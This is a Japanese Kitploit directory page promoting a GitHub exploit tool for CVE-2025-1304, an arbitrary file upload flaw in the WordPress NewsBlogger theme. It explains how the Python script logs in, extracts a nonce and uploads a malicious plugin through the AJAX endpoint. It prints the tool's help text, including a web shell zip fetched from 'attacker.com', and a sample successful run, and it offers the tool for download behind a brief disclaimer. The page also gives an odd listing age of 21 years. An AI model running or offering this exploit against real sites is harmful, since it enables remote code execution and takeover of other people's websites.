Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2025-1304 — WordPress NewsBlogger Theme <= 0.2.5.1 には任意のファイルアップロードの脆弱性があります。 | Kitploit
ツール/GitHubGitHub/nxploited/cve-2025-1304
脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテスト学習と教育
GitHubnxploited/cve-2025-1304

CVE-2025-1304

WordPress NewsBlogger Theme <= 0.2.5.1 には任意のファイルアップロードの脆弱性があります。

リポジトリを見る
21年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

🚨 WordPress NewsBlogger Theme <= 0.2.5.1 - 任意ファイルアップロード (CVE-2025-1304)

CVSSスコア: 8.8 (高)
脆弱性タイプ: 任意ファイルアップロード
コンポーネント: WordPressテーマ
CVE ID: CVE-2025-1304


🔥 脆弱性の概要

NewsBlogger WordPressテーマ(バージョン <= 0.2.5.1)には、管理画面のウェルカムパネルを介した任意ファイルアップロードの脆弱性が存在します。

この脆弱性により、最小権限の**購読者(Subscriber)**ロールを含む、認証されたすべてのユーザーが、Webシェルを含む悪意のある.zipアーカイブをアップロードできます。
このアップロードは、検証されていないプラグインURLフィールドを介して行われ、アップロードされたファイルの内容や種類を適切に検証しません。

攻撃が成功すると、リモートコード実行や権限昇格を含む、Webサイトの完全な乗っ取りにつながる可能性があります。


🧠 スクリプトの詳細

このPythonスクリプトは、以下の方法で脆弱性の悪用を自動化します:

  • 指定された管理者資格情報を使用してログインします。
  • 脆弱なウェルカムページからnonceを動的に抽出します。
  • 脆弱なAJAXエンドポイントを介してリモートの悪意のあるプラグインをアップロードします。

⚙️ 使用手順

root@kitploit:~
python CVE-2025-1304.py -h
root@kitploit:~
usage: a.py [-h] --url URL --username USERNAME --password PASSWORD --shellweb SHELLWEB

WordPress NewsBlogger Theme vulnerable to Arbitrary File Upload #By: Nxploited ( Khaled Alenazi )

options:
  -h, --help                show this help message and exit
  --url, -u URL             Target base URL (e.g., http://target/wordpress)
  --username, -un USERNAME WordPress admin username
  --password, -p PASSWORD   WordPress admin password
  --shellweb, -shell SHELLWEB
                           Direct URL to the malicious shell zip (e.g., http://attacker.com/shell.zip)

📤 出力例

root@kitploit:~
[+] Logging in to http://target/wordpress/wp-login.php
[+] Logged in successfully.
[+] Fetching welcome page to extract nonce: http://target/wordpress/wp-admin/admin.php?page=newsblogger-welcome
[+] Extracted nonce: 012818100b
[+] Sending malicious plugin URL to: http://target/wordpress/wp-admin/admin-ajax.php
[+] Server response:
{"success":true,"data":{"redirect_url":"http://target/wordpress/wp-admin/admin.php?page=newsblogger-welcome"}}

⚠️ 免責事項

このコードは、教育目的および許可されたセキュリティテストの目的でのみ提供されます。
作者は、このツールの誤用またはそれによって引き起こされた損害について一切の責任を負いません。


作者: Nxploited ( Khaled Alenazi )

ツールをダウンロード